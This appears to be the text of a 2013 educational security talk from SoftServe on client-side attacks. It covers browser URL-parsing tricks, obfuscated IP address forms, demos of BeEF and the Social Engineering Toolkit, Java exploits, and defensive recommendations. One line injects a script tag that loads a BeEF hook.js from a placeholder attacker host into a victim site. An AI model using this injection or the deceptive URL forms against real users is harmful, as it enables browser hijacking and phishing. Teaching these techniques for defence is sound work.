Welcome to the world of

HACKINGby Nazar Tymoshyk, R&D team, SoftServe& Bohdan Serednyskyj, R&D team, SoftServe

What this topic is about?

Як це бачать друзі Що думає мама Як сприймає суспільство

Як це бачить влада Як уявляю собі це я А що є насправді

This is more educational topic, not motivational

Amateurs hacks - systems, Professionals hacks - PEOPLE

Client Side Attacks

About me

Feel free to ask me anything :)

Best SoftServe Team – R&D

Security TeamNazar TymoshykCEH, HP FSTS, CIW WSS, Cisco SS, ZSS, CLE, DCTS, DCATS,NAI,CLP,NLTS,CNA,NCLA,MCTS

Bohdan SerednytskyiCEH, MSTC Security, ZSS

Certifications

Ph.D in Security

Identity & Security

SoftServe experts are certified in HP Fortify

Security Testing solution

Time for fun. Just relax

Target – web users

Everybody knows that Government is spying us

Every day we are getting suspicious emails

And online promotions

Yes!!! Just click link below

Quick Quiz

1. Will this URL work in IE?

http:\\example.com\

2. What page will be opened in Firefox browser after entering this URL?

http://example.com\@coredump.cx/

1. Yes. IE and most browsers parse “\” as “/” for usability reasons.

2. In Firefox, that URL will take the user to coredump.cx, because example.com\ will be interpreted as a valid value for the login field. In almost all other browsers, “\” will be interpreted as a path delimiter, and the user will land on example.com instead.

Answers

Now try it by yourself and answer what you get?!

Tricky URLs

For all browsershttp://example.com&gibberish=1234@167772161/

And http://example.com\@coredump.cx/ is http://example.com/ for all…

This is it!

For all browsershttp://example.com&gibberish=1234@167772161/

And http://example.com\@coredump.cx/ is http://example.com/ for all…

is http://10.0.0.1/

…but for Firefox it’s http://coredump.cx/

Cheatershttp://example.com/.wholesome-domain.com/

This only looks like a real Slash.Read: Evgeniy Gabrilovich and Alex Gontmakher “The Homograph Attack”

Server addresses

•http://127.0.0.1/ This is a canonical representation of an IPv4 address.

•http://0x7f.1/ This is a representation of the same address that uses a hexadecimal number to represent the first octet and concatenates all the remaining octets into a single decimal value.

•http://017700000001/ The same address is denoted using a 0-prefixed octal value, with all octets concatenated into a single 32-bit integer.

Now attention

Recommended Book

DEMO I

BeeF – Browser exploitation framework

Our victim site <script src=http://attackersite/hook.js></script>

http://192.168.241.240:8882

Now about Java

Everybody likes Java

Butthere is a small problem

in 2013

Java exploits in Metasploit 4

Status - Excellent

JVM vulnerabilities

DEMO II

Social Engineering TOolkit

Consequences

• Stolen Developer Cloud access Certificates• Malware and Spyware on PC and mobile• Key loggers • Money Lost – Paypal, webmoney, etc.• Email – recovery and steal accounts• SHAME!

Recommendations

• Up to date JAVA and all other software• Antivirus – Kasper rocks!• Encrypted keys to infrastructure• 2 factor authentication everywhere

(email first)• Verify yourself and your browser on …

•Attention

OWASP Secure Coding Guide

Apache Shiro

OWASP WebGoat, DVWA - Train yourself in Security

Hope you like it!

Now ask!

Thank You!Copyright © 2013 SoftServe, Inc.

Email: root.nt@gmail.comSkype: root_nt